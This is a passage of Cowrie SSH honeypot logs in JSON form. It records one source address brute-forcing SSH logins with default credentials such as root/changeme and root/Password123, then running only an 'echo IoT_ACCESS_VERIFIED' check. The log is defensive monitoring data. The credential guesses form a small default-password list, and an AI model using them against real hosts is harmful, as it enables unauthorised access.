":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:55.749381Z","src_ip":"212.227.235.229","session":"20695fb3a95f"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:57.153062Z","src_ip":"212.227.235.229","session":"20695fb3a95f"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:58.623213Z","src_ip":"212.227.235.229","session":"20695fb3a95f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58160,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3cd48d7c6bd","protocol":"ssh","message":"New connection: 212.227.235.229:58160 (1.2.3.4:22) [session: f3cd48d7c6bd]","sensor":"my-vps","timestamp":"2025-08-28T23:22:58.720403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:59.219566Z","src_ip":"212.227.235.229","session":"f3cd48d7c6bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:59.220852Z","src_ip":"212.227.235.229","session":"f3cd48d7c6bd"}
{"eventid":"cowrie.login.success","username":"root","password":"Password123","message":"login attempt [root/Password123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:23:00.957700Z","src_ip":"212.227.235.229","session":"f3cd48d7c6bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:23:01.851779Z","src_ip":"212.227.235.229","session":"f3cd48d7c6bd"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:23:01.852547Z","src_ip":"212.227.235.229","session":"f3cd48d7c6bd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:02.015070Z","src_ip":"212.227.235.229","session":"f3cd48d7c6bd"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:02.016328Z","src_ip":"212.227.235.229","session":"f3cd48d7c6bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43452,"dst_ip":"1.2.3.4","dst_port":22,"session":"02f63345d447","protocol":"ssh","message":"New connection: 212.227.235.229:43452 (1.2.3.4:22) [session: 02f63345d447]","sensor":"my-vps","timestamp":"2025-08-28T23:23:02.119972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:23:02.175821Z","src_ip":"212.227.235.229","session":"02f63345d447"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:23:02.259650Z","src_ip":"212.227.235.229","session":"02f63345d447"}
{"eventid":"cowrie.login.success","username":"root","password":"changeme","message":"login attempt [root/changeme] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:23:03.434652Z","src_ip":"212.227.235.229","session":"02f63345d447"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:23:04.258714Z","src_ip":"212.227.235.229","session":"02f63345d447"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:23:04.259407Z","src_ip":"212.227.235.229","session":"02f63345d447"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:04.632268Z","src_ip":"212.227.235.229","session":"02f63345d447"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:04.633984Z","src_ip":"212.227.235.229","session":"02f63345d447"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55176,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee441ec05109","protocol":"ssh","message":"New connection: 212.227.235.229:55176 (1.2.3.4:22) [session: ee441ec05109]","sensor":"my-vps","timestamp":"2025-08-28T23:23:04.748545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:23:04.946562Z","src_ip":"212.227.235.229","session":"ee441ec05109"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:23:04.947444Z","src_ip":"212.227.235.229","session":"ee441ec05109"}
{"eventid":"cowrie.login.failed","username":"ssh","password":"ssh","message":"login attempt [ssh/ssh] failed","sensor":"my-vps","timestamp":"2025-08-28T23:23:07.062382Z","src_ip":"212.227.235.229","session":"ee441ec05109"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:08.440786Z","src_ip":"212.227.235.229","session":"ee441ec05109"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42746,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4740872437e","protocol":"ssh","message":"New connection: 212.227.235.229:42746 (1.2.3.4:22) [session: f4740872437e]","sensor":"my-vps","timestamp":"2025-08-28T23:23:08.554276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:23:08.853759Z","src_ip":"212.227.235.229","session":"f4740872437e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:23:08.854678Z","src_ip":"212.227.235.229","session":"f4740872437e"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"daemon","message":"login attempt [daemon/daemon] failed","sensor":"my-vps","timestamp":"2025-08-28T23:23:11.023966Z","src_ip":"212.227.235.229","session":"f4740872437e"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:12.423575Z","src_ip":"212.227.235.229","session":"f4740872437e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58956,"dst_ip":"1.2.3.4","dst_port":22,"session":"9379a10f5576","protocol":"ssh","message":"New connection: 212.227.235.229:58956 (1.2.3.4:22) [session: 9379a10f5576]","sensor":"my-vps","timestamp":"2025-08-28T23:23:12.519009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:23:13.900243Z","src_ip":"212.227.235.229","session":"9379a10f5576"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:23:13.901759Z","src_ip":"212.227.235.229","session":"9379a10f5576"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T23:23:14.741954Z","src_ip":"212.227.235.229","session":"9379a10f5576"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:16.235940Z","src_ip":"212.227.235.229","session":"9379a10f5576"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50320,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a374b4fe071","protocol":"ssh","message":"New connection: 212.227.235.229:50320 (1.2.3.4:22) [session: 7a374b4fe071]","sensor":"my-vps","timestamp":"2025-08-28T23:23:16.326632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:23:16.545676Z","src_ip":"212.227.235.229","session":"7a374b4fe071"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:23:16.546550Z","src_ip":"212.227.235.229","session":"7a374b4fe071"}
{"eventid":"cowrie.login.success","username":"root","password":"hacked","message":"login attempt [root/hacked] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:23:18.261540Z","src_ip":"212.227.235.229","session":"7a374b4fe071"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:23:19.681465Z","src_ip":"212.227.235.229","session":"7a374b4fe071"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:23:19.682175Z","src_ip":"212.227.235.229","session":"7a374b4fe071"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:20.010417Z","src_ip":"212.227.235.229","session":"7a374b4fe071"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:20.011581Z","src_ip":"212.227.235.229","session":"7a374b4fe071"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40630,"dst_ip":"1.2.3.4","dst_port":22,"session":"59aa87575a95","protocol":"ssh","message":"New connection: 212.227.235.229:40630 (1.2.3.4:22) [session: 59aa87575a95]","sensor":"my-vps","timestamp":"2025-08-28T23:23:20.132665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:23:20.240317Z","src_ip":"212.227.235.229","session":"59aa87575a95"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:23:20.241104Z","src_ip":"212.227.235.229","session":"59aa87575a95"}
{"eventid":"cowrie.login.success","username":"root","password":"scanner","message":"login attempt [root/scanner] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:23:21.068160Z","src_ip":"212.227.235.229","session":"59aa87575a95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:23:21.482234Z","src_ip":"212.227.235.229","session":"59aa87575a95"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:23:21.483000Z","src_ip":"212.227.235.229","session":"59aa87575a95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:21.583247Z","src_ip":"212.227.235.229","session":"59aa87575a95"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:21.584418Z","src_ip":"212.227.235.229","session":"59aa87575a95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48770,"dst_ip":"1.2.3.4","dst_port":22,"session":"f40663739431","protocol":"ssh","message":"New connection: 212.227.235.229:48770 (1.2.3.4:22) [session: f40663739431]","sensor":"my-vps","timestamp":"2025-08-28T23:23:21.692442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:23:21.707870Z","src_ip":"212.227.235.229","session":"f40663739431"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:23:21.797530Z","src_ip":"212.227.235.229","session":"f40663739431"}
{"eventid":"cowrie.login.success","username":"root","password":"1337","message":"login attempt [root/1337] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:23:22.374299Z","src_ip":"212.227.235.229","session":"f40663739431"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:23:23.323717Z","src_ip":"212.227.235.229","session":"f40663739431"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:23:23.324418Z","src_ip":"212.227.235.229","session":"f40663739431"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:23.629500Z","src_ip":"212.227.235.229","session":"f40663739431"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:23.630633Z","src_ip":"212.227.235.229","session":"f40663739431"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59282,"dst_ip":"1.2.3.4","dst_port":22,"session":"82e039bd4ece","protocol":"ssh","message":"New connection: 212.227.235.229:59282 (1.2.3.4:22) [session: 82e039bd4ece]","sensor":"my-vps","timestamp":"2025-08-28T23:23:23.734761Z"}
